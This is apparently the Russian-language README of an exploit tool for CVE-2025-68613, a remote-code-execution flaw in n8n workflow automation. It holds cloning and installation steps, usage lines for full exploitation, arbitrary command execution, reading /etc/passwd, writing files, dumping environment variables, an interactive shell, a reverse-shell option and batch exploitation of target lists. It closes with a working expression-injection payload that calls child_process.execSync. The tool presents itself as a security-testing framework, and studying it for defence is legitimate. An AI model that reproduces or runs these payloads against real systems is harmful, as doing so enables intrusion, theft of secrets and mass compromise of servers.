n8n God Mode Ultimate - CVE-2025-68613 Scanner v1.0.0 ║ ║ Удаленное выполнение кода автоматизации рабочих процессов
n8n God Mode Ultimate — это комплексный фреймворк для тестирования безопасности, предназначенный для обнаружения и проверки CVE-2025-68613 в платформах автоматизации рабочих процессов n8n. Эта критическая уязвимость удаленного выполнения кода (RCE) затрагивает версии n8n через внедрение выражений в контекстах выполнения рабочих процессов.
Затронутые версии:
Исправленные версии:
--detect — Только определение версии (самый быстрый, неинтрузивный)--safe — Безопасная проверка уязвимости без эксплуатации--poc — Проверка концепции RCE--exploit — Полный режим эксплуатацииread <файл> — Чтение удаленных файловwrite <файл> <содержимое> — Запись файлов на цель# Python 3.8 или выше
python3 --version
# Менеджер пакетов pip
pip3 --version
# Клонирование репозитория
git clone https://github.com/hackersatyamrastogi/n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate.git
cd n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate
# Установка необходимых пакетов
pip3 install -r requirements.txt
requests>=2.31.0
urllib3>=2.0.0
tqdm>=4.66.0
colorama>=0.4.6
# Показать меню справки
python3 n8n-godmode-ultimate.py -h
# Определить версию n8n (неинтрузивно)
python3 n8n-godmode-ultimate.py -u http://target:5678 --detect
# Безопасная проверка уязвимости
python3 n8n-godmode-ultimate.py -u http://target:5678 --safe -e [email protected] -p password
# Проверка концепции RCE
python3 n8n-godmode-ultimate.py -u http://target:5678 --poc -e [email protected] -p password
# Полная эксплуатация
python3 n8n-godmode-ultimate.py -u http://target:5678 --exploit -e [email protected] -p password
# Выполнить одну команду
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
-e [email protected] -p password --cmd "whoami"
# Прочитать удаленный файл
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
-e [email protected] -p password --read-file "/etc/passwd"
# Записать удаленный файл
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
-e [email protected] -p password --write-file "/tmp/test.txt" --content "payload"
# Извлечь переменные окружения
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
-e [email protected] -p password --dump-env
# Интерактивная оболочка
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
-e [email protected] -p password --shell
# Сканирование нескольких целей из файла
python3 n8n-godmode-ultimate.py -l targets.txt --detect -t 20
# Пакетная эксплуатация
python3 n8n-godmode-ultimate.py -l targets.txt --poc -e [email protected] -p password -t 10
Формат targets.txt:
http://target1:5678
https://target2.example.com
http://192.168.1.100:5678
https://n8n.example.org
В режиме оболочки (--shell):
n8n> whoami # Выполнить команду
n8n> read /etc/passwd # Прочитать файл
n8n> env # Показать переменные окружения
n8n> info # Информация о системе
n8n> history # История команд
n8n> exit # Выйти из оболочки
-u, --url URL URL целевого n8n
-l, --list FILE Файл со списком URL целей
-t, --threads NUM Количество потоков для пакетного сканирования (по умолчанию: 10)
-e, --email EMAIL Email пользователя n8n
-p, --password PASS Пароль пользователя n8n
--detect Только определение версии (самый быстрый)
--safe Безопасная проверка без эксплуатации
--poc Проверка концепции RCE
--exploit Полный режим эксплуатации
--god Включить god mode
--cmd COMMAND Выполнить одну команду
--read-file PATH Прочитать удаленный файл
--write-file PATH Записать удаленный файл
--content DATA Содержимое для операции записи
--dump-env Извлечь все переменные окружения
--shell Режим интерактивной оболочки
--revshell HOST:PORT Полезная нагрузка обратной оболочки
--mode MODE Режим эксплуатации: schedule|webhook|code|expression (по умолчанию: schedule)
--timeout SEC Тайм-аут команды в секундах (по умолчанию: 30)
--cleanup Удалить рабочие процессы после выполнения
-k, --insecure Отключить проверку SSL
-v, --verbose Подробный вывод
-q, --quiet Минимальный вывод
Создает рабочий процесс с запланированным триггером, который автоматически выполняется каждые 3 секунды. Самый надежный метод.
Payload: {{(function(){
return this.process.mainModule.require('child_process')
.execSync('whoami').toString()
})()}}